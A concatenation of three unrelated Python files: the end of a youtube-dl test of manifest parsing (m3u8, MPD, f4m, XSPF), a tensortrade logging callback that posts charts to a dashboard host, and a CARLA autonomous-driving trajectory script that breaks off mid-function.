[{
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-audio-160k_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': 'audio-0-Default',
'protocol': 'm3u8',
'vcodec': 'none',
}, {
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-audio-64k_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': 'audio-1-Default',
'protocol': 'm3u8',
'vcodec': 'none',
}, {
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-audio-64k_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': '71',
'protocol': 'm3u8',
'acodec': 'mp4a.40.5',
'vcodec': 'none',
'tbr': 71,
}, {
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-400k_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': '413',
'protocol': 'm3u8',
'acodec': 'none',
'vcodec': 'avc1.42001e',
'tbr': 413,
'width': 400,
'height': 224,
}, {
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-400k_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': '522',
'protocol': 'm3u8',
'acodec': 'none',
'vcodec': 'avc1.42001e',
'tbr': 522,
'width': 400,
'height': 224,
}, {
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-1m_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': '1205',
'protocol': 'm3u8',
'acodec': 'none',
'vcodec': 'avc1.4d001e',
'tbr': 1205,
'width': 640,
'height': 360,
}, {
'url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/hls/CONAN_020217_Highlight_show-2m_v4.m3u8',
'manifest_url': 'http://ak.storage-w.teamcococdn.com/cdn/2017-02/98599/ed8f/main.m3u8',
'ext': 'mp4',
'format_id': '2374',
'protocol': 'm3u8',
'acodec': 'none',
'vcodec': 'avc1.4d001f',
'tbr': 2374,
'width': 1024,
'height': 576,
}]
),
(
# https://github.com/ytdl-org/youtube-dl/issues/12211
# http://video.toggle.sg/en/series/whoopie-s-world/ep3/478601
'toggle_mobile_12211',
'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
[{
'url': 'http://k.toggle.sg/fhls/p/2082311/sp/208231100/serveFlavor/entryId/0_89q6e8ku/v/2/pv/1/flavorId/0_sa2ntrdg/name/a.mp4/index.m3u8',
'manifest_url': 'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
'ext': 'mp4',
'format_id': 'audio-English',
'protocol': 'm3u8',
'language': 'eng',
'vcodec': 'none',
}, {
'url': 'http://k.toggle.sg/fhls/p/2082311/sp/208231100/serveFlavor/entryId/0_89q6e8ku/v/2/pv/1/flavorId/0_r7y0nitg/name/a.mp4/index.m3u8',
'manifest_url': 'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
'ext': 'mp4',
'format_id': 'audio-Undefined',
'protocol': 'm3u8',
'language': 'und',
'vcodec': 'none',
}, {
'url': 'http://k.toggle.sg/fhls/p/2082311/sp/208231100/serveFlavor/entryId/0_89q6e8ku/v/2/pv/1/flavorId/0_qlk9hlzr/name/a.mp4/index.m3u8',
'manifest_url': 'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
'ext': 'mp4',
'format_id': '155',
'protocol': 'm3u8',
'tbr': 155.648,
'width': 320,
'height': 180,
}, {
'url': 'http://k.toggle.sg/fhls/p/2082311/sp/208231100/serveFlavor/entryId/0_89q6e8ku/v/2/pv/1/flavorId/0_oefackmi/name/a.mp4/index.m3u8',
'manifest_url': 'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
'ext': 'mp4',
'format_id': '502',
'protocol': 'm3u8',
'tbr': 502.784,
'width': 480,
'height': 270,
}, {
'url': 'http://k.toggle.sg/fhls/p/2082311/sp/208231100/serveFlavor/entryId/0_89q6e8ku/v/12/pv/1/flavorId/0_vyg9pj7k/name/a.mp4/index.m3u8',
'manifest_url': 'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
'ext': 'mp4',
'format_id': '827',
'protocol': 'm3u8',
'tbr': 827.392,
'width': 640,
'height': 360,
}, {
'url': 'http://k.toggle.sg/fhls/p/2082311/sp/208231100/serveFlavor/entryId/0_89q6e8ku/v/12/pv/1/flavorId/0_50n4psvx/name/a.mp4/index.m3u8',
'manifest_url': 'http://cdnapi.kaltura.com/p/2082311/sp/208231100/playManifest/protocol/http/entryId/0_89q6e8ku/format/applehttp/tags/mobile_sd/f/a.m3u8',
'ext': 'mp4',
'format_id': '1396',
'protocol': 'm3u8',
'tbr': 1396.736,
'width': 854,
'height': 480,
}]
),
(
# http://www.twitch.tv/riotgames/v/6528877
'twitch_vod',
'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
[{
'url': 'https://vod.edgecast.hls.ttvnw.net/e5da31ab49_riotgames_15001215120_261543898/audio_only/index-muted-HM49I092CC.m3u8',
'manifest_url': 'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
'ext': 'mp4',
'format_id': 'Audio Only',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'none',
'tbr': 182.725,
}, {
'url': 'https://vod.edgecast.hls.ttvnw.net/e5da31ab49_riotgames_15001215120_261543898/mobile/index-muted-HM49I092CC.m3u8',
'manifest_url': 'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
'ext': 'mp4',
'format_id': 'Mobile',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.42C00D',
'tbr': 280.474,
'width': 400,
'height': 226,
}, {
'url': 'https://vod.edgecast.hls.ttvnw.net/e5da31ab49_riotgames_15001215120_261543898/low/index-muted-HM49I092CC.m3u8',
'manifest_url': 'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
'ext': 'mp4',
'format_id': 'Low',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.42C01E',
'tbr': 628.347,
'width': 640,
'height': 360,
}, {
'url': 'https://vod.edgecast.hls.ttvnw.net/e5da31ab49_riotgames_15001215120_261543898/medium/index-muted-HM49I092CC.m3u8',
'manifest_url': 'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
'ext': 'mp4',
'format_id': 'Medium',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.42C01E',
'tbr': 893.387,
'width': 852,
'height': 480,
}, {
'url': 'https://vod.edgecast.hls.ttvnw.net/e5da31ab49_riotgames_15001215120_261543898/high/index-muted-HM49I092CC.m3u8',
'manifest_url': 'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
'ext': 'mp4',
'format_id': 'High',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.42C01F',
'tbr': 1603.789,
'width': 1280,
'height': 720,
}, {
'url': 'https://vod.edgecast.hls.ttvnw.net/e5da31ab49_riotgames_15001215120_261543898/chunked/index-muted-HM49I092CC.m3u8',
'manifest_url': 'https://usher.ttvnw.net/vod/6528877?allow_source=true&allow_audio_only=true&allow_spectre=true&player=twitchweb&nauth=%7B%22user_id%22%3Anull%2C%22vod_id%22%3A6528877%2C%22expires%22%3A1492887874%2C%22chansub%22%3A%7B%22restricted_bitrates%22%3A%5B%5D%7D%2C%22privileged%22%3Afalse%2C%22https_required%22%3Afalse%7D&nauthsig=3e29296a6824a0f48f9e731383f77a614fc79bee',
'ext': 'mp4',
'format_id': 'Source',
'protocol': 'm3u8',
'acodec': 'mp4a.40.2',
'vcodec': 'avc1.100.31',
'tbr': 3214.134,
'width': 1280,
'height': 720,
}]
),
(
# http://www.vidio.com/watch/165683-dj_ambred-booyah-live-2015
# EXT-X-STREAM-INF tag with NAME attribute that is not defined
# in HLS specification
'vidio',
'https://www.vidio.com/videos/165683/playlist.m3u8',
[{
'url': 'https://cdn1-a.production.vidio.static6.com/uploads/165683/dj_ambred-4383-b300.mp4.m3u8',
'manifest_url': 'https://www.vidio.com/videos/165683/playlist.m3u8',
'ext': 'mp4',
'format_id': '270p 3G',
'protocol': 'm3u8',
'tbr': 300,
'width': 480,
'height': 270,
}, {
'url': 'https://cdn1-a.production.vidio.static6.com/uploads/165683/dj_ambred-4383-b600.mp4.m3u8',
'manifest_url': 'https://www.vidio.com/videos/165683/playlist.m3u8',
'ext': 'mp4',
'format_id': '360p SD',
'protocol': 'm3u8',
'tbr': 600,
'width': 640,
'height': 360,
}, {
'url': 'https://cdn1-a.production.vidio.static6.com/uploads/165683/dj_ambred-4383-b1200.mp4.m3u8',
'manifest_url': 'https://www.vidio.com/videos/165683/playlist.m3u8',
'ext': 'mp4',
'format_id': '720p HD',
'protocol': 'm3u8',
'tbr': 1200,
'width': 1280,
'height': 720,
}]
),
(
# https://github.com/ytdl-org/youtube-dl/issues/18923
# https://www.ted.com/talks/boris_hesser_a_grassroots_healthcare_revolution_in_africa
'ted_18923',
'http://hls.ted.com/talks/31241.m3u8',
[{
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/audio/600k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '600k-Audio',
'vcodec': 'none',
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/audio/600k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '68',
'vcodec': 'none',
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/64k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '163',
'acodec': 'none',
'width': 320,
'height': 180,
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/180k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '481',
'acodec': 'none',
'width': 512,
'height': 288,
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/320k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '769',
'acodec': 'none',
'width': 512,
'height': 288,
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/450k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '984',
'acodec': 'none',
'width': 512,
'height': 288,
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/600k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '1255',
'acodec': 'none',
'width': 640,
'height': 360,
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/950k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '1693',
'acodec': 'none',
'width': 853,
'height': 480,
}, {
'url': 'http://hls.ted.com/videos/BorisHesser_2018S/video/1500k.m3u8?nobumpers=true&uniqueId=76011e2b',
'format_id': '2462',
'acodec': 'none',
'width': 1280,
'height': 720,
}]
),
]
for m3u8_file, m3u8_url, expected_formats in _TEST_CASES:
with io.open('./test/testdata/m3u8/%s.m3u8' % m3u8_file,
mode='r', encoding='utf-8') as f:
formats = self.ie._parse_m3u8_formats(
f.read(), m3u8_url, ext='mp4')
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
def test_parse_mpd_formats(self):
_TEST_CASES = [
(
# https://github.com/ytdl-org/youtube-dl/issues/13919
# Also tests duplicate representation ids, see
# https://github.com/ytdl-org/youtube-dl/issues/15111
'float_duration',
'http://unknown/manifest.mpd', # mpd_url
None, # mpd_base_url
[{
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'm4a',
'format_id': '318597',
'format_note': 'DASH audio',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'none',
'tbr': 61.587,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '318597',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.42001f',
'tbr': 318.597,
'width': 340,
'height': 192,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '638590',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.42001f',
'tbr': 638.59,
'width': 512,
'height': 288,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '1022565',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.4d001f',
'tbr': 1022.565,
'width': 688,
'height': 384,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '2046506',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.4d001f',
'tbr': 2046.506,
'width': 1024,
'height': 576,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '3998017',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.640029',
'tbr': 3998.017,
'width': 1280,
'height': 720,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '5997485',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.640032',
'tbr': 5997.485,
'width': 1920,
'height': 1080,
}]
), (
# https://github.com/ytdl-org/youtube-dl/pull/14844
'urls_only',
'http://unknown/manifest.mpd', # mpd_url
None, # mpd_base_url
[{
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_144p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 200,
'width': 256,
'height': 144,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_240p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 400,
'width': 424,
'height': 240,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_360p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 800,
'width': 640,
'height': 360,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_480p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 1200,
'width': 856,
'height': 480,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_576p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 1600,
'width': 1024,
'height': 576,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_720p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 2400,
'width': 1280,
'height': 720,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_1080p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 4400,
'width': 1920,
'height': 1080,
}]
), (
# https://github.com/ytdl-org/youtube-dl/issues/20346
# Media considered unfragmented even though it contains
# Initialization tag
'unfragmented',
'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd', # mpd_url
'https://v.redd.it/hw1x7rcg7zl21', # mpd_base_url
[{
'url': 'https://v.redd.it/hw1x7rcg7zl21/audio',
'manifest_url': 'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd',
'ext': 'm4a',
'format_id': 'AUDIO-1',
'format_note': 'DASH audio',
'container': 'm4a_dash',
'acodec': 'mp4a.40.2',
'vcodec': 'none',
'tbr': 129.87,
'asr': 48000,
}, {
'url': 'https://v.redd.it/hw1x7rcg7zl21/DASH_240',
'manifest_url': 'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd',
'ext': 'mp4',
'format_id': 'VIDEO-2',
'format_note': 'DASH video',
'container': 'mp4_dash',
'acodec': 'none',
'vcodec': 'avc1.4d401e',
'tbr': 608.0,
'width': 240,
'height': 240,
'fps': 30,
}, {
'url': 'https://v.redd.it/hw1x7rcg7zl21/DASH_360',
'manifest_url': 'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd',
'ext': 'mp4',
'format_id': 'VIDEO-1',
'format_note': 'DASH video',
'container': 'mp4_dash',
'acodec': 'none',
'vcodec': 'avc1.4d401e',
'tbr': 804.261,
'width': 360,
'height': 360,
'fps': 30,
}]
)
]
for mpd_file, mpd_url, mpd_base_url, expected_formats in _TEST_CASES:
with io.open('./test/testdata/mpd/%s.mpd' % mpd_file,
mode='r', encoding='utf-8') as f:
formats = self.ie._parse_mpd_formats(
compat_etree_fromstring(f.read().encode('utf-8')),
mpd_base_url=mpd_base_url, mpd_url=mpd_url)
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
def test_parse_f4m_formats(self):
_TEST_CASES = [
(
# https://github.com/ytdl-org/youtube-dl/issues/14660
'custom_base_url',
'http://api.new.livestream.com/accounts/6115179/events/6764928/videos/144884262.f4m',
[{
'manifest_url': 'http://api.new.livestream.com/accounts/6115179/events/6764928/videos/144884262.f4m',
'ext': 'flv',
'format_id': '2148',
'protocol': 'f4m',
'tbr': 2148,
'width': 1280,
'height': 720,
}]
),
]
for f4m_file, f4m_url, expected_formats in _TEST_CASES:
with io.open('./test/testdata/f4m/%s.f4m' % f4m_file,
mode='r', encoding='utf-8') as f:
formats = self.ie._parse_f4m_formats(
compat_etree_fromstring(f.read().encode('utf-8')),
f4m_url, None)
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
def test_parse_xspf(self):
_TEST_CASES = [
(
'foo_xspf',
'https://example.org/src/foo_xspf.xspf',
[{
'id': 'foo_xspf',
'title': 'Pandemonium',
'description': 'Visit http://bigbrother404.bandcamp.com',
'duration': 202.416,
'formats': [{
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.org/src/cd1/track%201.mp3',
}],
}, {
'id': 'foo_xspf',
'title': 'Final Cartridge (Nichico Twelve Remix)',
'description': 'Visit http://bigbrother404.bandcamp.com',
'duration': 255.857,
'formats': [{
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.org/%E3%83%88%E3%83%A9%E3%83%83%E3%82%AF%E3%80%80%EF%BC%92.mp3',
}],
}, {
'id': 'foo_xspf',
'title': 'Rebuilding Nightingale',
'description': 'Visit http://bigbrother404.bandcamp.com',
'duration': 287.915,
'formats': [{
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.org/src/track3.mp3',
}, {
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.com/track3.mp3',
}]
}]
),
]
for xspf_file, xspf_url, expected_entries in _TEST_CASES:
with io.open('./test/testdata/xspf/%s.xspf' % xspf_file,
mode='r', encoding='utf-8') as f:
entries = self.ie._parse_xspf(
compat_etree_fromstring(f.read().encode('utf-8')),
xspf_file, xspf_url=xspf_url, xspf_base_url=xspf_url)
expect_value(self, entries, expected_entries, None)
for i in range(len(entries)):
expect_dict(self, entries[i], expected_entries[i])
def test_response_with_expected_status_returns_content(self):
# Checks for mitigations against the effects of
# <https://bugs.python.org/issue15002> that affect Python 3.4.1+, which
# manifest as `_download_webpage`, `_download_xml`, `_download_json`,
# or the underlying `_download_webpage_handle` returning no content
# when a response matches `expected_status`.
httpd = compat_http_server.HTTPServer(
('127.0.0.1', 0), InfoExtractorTestRequestHandler)
port = http_server_port(httpd)
server_thread = threading.Thread(target=httpd.serve_forever)
server_thread.daemon = True
server_thread.start()
(content, urlh) = self.ie._download_webpage_handle(
'http://127.0.0.1:%d/teapot' % port, None,
expected_status=TEAPOT_RESPONSE_STATUS)
self.assertEqual(content, TEAPOT_RESPONSE_BODY)
if __name__ == '__main__':
unittest.main()
|
callbacks.py
|
from abc import abstractmethod
import requests
from tensortrade.env.default.renderers import PlotlyTradingChart
import threading
from tensortrade.core.component import Component
from tensortrade.core.base import TimeIndexed
from tensortrade.env.generic import EpisodeCallback
import time
class LoggingCallback(EpisodeCallback):
def __init__(self, host: str, plotly_renderer: PlotlyTradingChart):
self.host = host
self.plotly_renderer = plotly_renderer
self._fig = None
thr = threading.Thread(target=self.update, args=(), daemon=True)
thr.start()
def update(self):
while True:
try:
requests.post(f'{self.host}/update-fig', json=self._fig)
except Exception as ex:
print(f'Error: {ex}')
time.sleep(5)
def on_done(self, env: 'TradingEnv') -> None:
self.plotly_renderer.render(env)
self._fig = self.plotly_renderer.fig.to_json()
|
run_ours.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
from os.path import join, dirname
sys.path.insert(0, join(dirname(__file__), '../../'))
import simulator
simulator.load('/home/wang/CARLA_0.9.9.4')
import carla
sys.path.append('/home/wang/CARLA_0.9.9.4/PythonAPI/carla')
from agents.navigation.basic_agent import BasicAgent
from simulator import config, set_weather, add_vehicle
from simulator.sensor_manager import SensorManager
from utils.navigator_sim import get_map, get_nav, replan, close2dest
from utils import add_alpha_channel
from controller import CapacController, getActorState
import os
import cv2
import time
import copy
import threading
import random
import argparse
import numpy as np
from PIL import Image
from datetime import datetime
import matplotlib.pyplot as plt
plt.rcParams.update({'figure.max_open_warning': 0})
plt.ion()
import torch
from torch.autograd import grad
import torchvision.transforms as transforms
from learning.model import Generator, EncoderWithV
global_img = None
global_nav = None
global_v0 = 0.
global_vel = 0.
global_plan_time = 0.
global_trajectory = None
start_control = False
global_vehicle = None
global_plan_map = None
global_transform = None
max_steer_angle = 0.
global_view_img = None
state0 = None
global_collision = False
global_cnt = 0
MAX_SPEED = 30
img_height = 200
img_width = 400
speed_list = []
random.seed(datetime.now())
torch.manual_seed(999)
torch.cuda.manual_seed(999)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
parser = argparse.ArgumentParser(description='Params')
parser.add_argument('-d', '--data', type=int, default=1, help='data index')
parser.add_argument('-s', '--save', type=bool, default=False, help='save result')
parser.add_argument('--width', type=int, default=400, help='image width')
parser.add_argument('--height', type=int, default=200, help='image height')
parser.add_argument('--max_dist', type=float, default=25., help='max distance')
parser.add_argument('--max_t', type=float, default=3., help='max time')
parser.add_argument('--vector_dim', type=int, default=64, help='vector dim')
parser.add_argument('--max_speed', type=float, default=10., help='max speed')
parser.add_argument('--scale', type=float, default=25., help='longitudinal length')
parser.add_argument('--dt', type=float, default=0.05, help='discretization minimum time interval')
parser.add_argument('--rnn_steps', type=int, default=10, help='rnn readout steps')
args = parser.parse_args()
data_index = args.data
save_path = '/media/wang/DATASET/CARLA/town01/'+str(data_index)+'/'
encoder = EncoderWithV(input_dim=6, out_dim=args.vector_dim).to(device)
encoder.load_state_dict(torch.load('encoder.pth'))
encoder.eval()
generator = Generator(input_dim=1+1+args.vector_dim, output=2).to(device)
generator.load_state_dict(torch.load('generator.pth'))
generator.eval()
img_transforms = [
transforms.Resize((img_height, img_width)),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
img_trans = transforms.Compose(img_transforms)
def mkdir(path):
os.makedirs(save_path+path, exist_ok=True)
def image_callback(data):
global state0, global_img, global_plan_time, global_vehicle, global_plan_map,global_nav, global_transform, global_v0
global_plan_time = time.time()
global_transform = global_vehicle.get_transform()
state0 = getActorState('odom', global_plan_time, global_vehicle)
state0.x = global_transform.location.x
state0.y = global_transform.location.y
state0.z = global_transform.location.z
state0.theta = np.deg2rad(global_transform.rotation.yaw)
array = np.frombuffer(data.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (data.height, data.width, 4)) # RGBA format
global_img = array
global_nav = get_nav(global_vehicle, global_plan_map)
v = global_vehicle.get_velocity()
global_v0 = np.sqrt(v.x**2+v.y**2)
def view_image_callback(data):
global global_view_img
array = np.frombuffer(data.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (data.height, data.width, 4)) # RGBA format
global_view_img = array
def collision_callback(data):
global global_collision
global_collision = True
def visualize(input_img, nav):
global global_vel, global_cnt
global_cnt += 1
img = copy.deepcopy(input_img)
text = "speed: "+str(round(3.6*global_vel, 1))+' km/h'
cv2.putText(img, text, (20, 30), cv2.FONT_HERSHEY_PLAIN, 2.0, (255, 255, 255), 2)
new_nav = add_alpha_channel(nav)
new_nav = cv2.flip(new_nav, 1)
img[:nav.shape[0],-nav.shape[1]:] = new_nav
# if global_cnt % 2 == 0: cv2.imwrite('video/ours/WetCloudySunset/'+str(global_cnt)+'.png', copy.deepcopy(img))
cv2.imshow('Visualization', img)
cv2.waitKey(5)
def get_traj(plan_time, global_img, global_nav):
global global_v0, draw_cost_map, state0, global_vehicle
t = torch.arange(0, 0.99, args.dt).unsqueeze(1).to(device)
t.requires_grad = True
points_num = len(t)
v = global_v0 if global_v0 > 4 else 4
v_0 = torch.FloatTensor([v/args.max_speed]).unsqueeze(1)
v_0 = v_0.to(device)
condition = torch.FloatTensor([v/args.max_speed]*points_num).view(-1, 1)
condition = condition.to(device)
img = Image.fromarray(cv2.cvtColor(global_img,cv2.COLOR_BGR2RGB))
nav = Image.fromarray(cv2.cvtColor(global_nav,cv2.COLOR_BGR2RGB))
img = img_trans(img)
nav = img_trans(nav)
input_img = torch.cat((img, nav), 0).unsqueeze(0).to(device)
single_latent = encoder(input_img, v_0)
single_latent = single_latent.unsqueeze(1)
latent = single_latent.expand(1, points_num, single_latent.shape[-1])
latent = latent.reshape(1 * points_num, single_latent.shape[-1])
output = generator(condition, latent, t)
vx = grad(output[:,0].sum(), t, create_graph=True)[0][:,0]*(args.max_dist/args.max_t)
vy = grad(output[:,1].sum(), t, create_graph=True)[0][:,0]*(args.max_dist/args.max_t)
ax = grad(vx.sum(), t, create_graph=True)[0][:,0]/args.max_t
ay = grad(vy.sum(), t, create_graph=True)[0][:,0]/args.max_t
output_axy = torch.cat([ax.unsqueeze(1), ay.unsqueeze(1)], dim=1)
